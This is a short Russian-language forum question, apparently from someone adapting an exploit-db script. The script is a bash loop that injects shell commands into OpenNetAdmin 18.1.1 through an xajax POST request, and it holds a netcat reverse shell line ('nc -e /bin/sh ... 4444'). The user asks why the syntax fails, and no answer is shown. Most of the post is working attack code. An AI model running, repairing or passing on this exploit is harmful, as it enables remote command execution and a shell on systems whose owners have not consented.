Я обнаружил эксплойт в exploit-db для OpenNetAdmin 18.1.1
Я должен настроить этот скрипт так, чтобы он работал для меня, но я этого не сделал. Это то, что у меня есть:
URL="xxx.xxx.xxx.xxx/ona"
while true;do
echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx 4444 "}; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
Вывод просто:
{nc -e /bin/sh xxx.xxx.xxx.xxx 4444 }
Я немного борюсь с синтаксисом.
Что я сделал неправильно?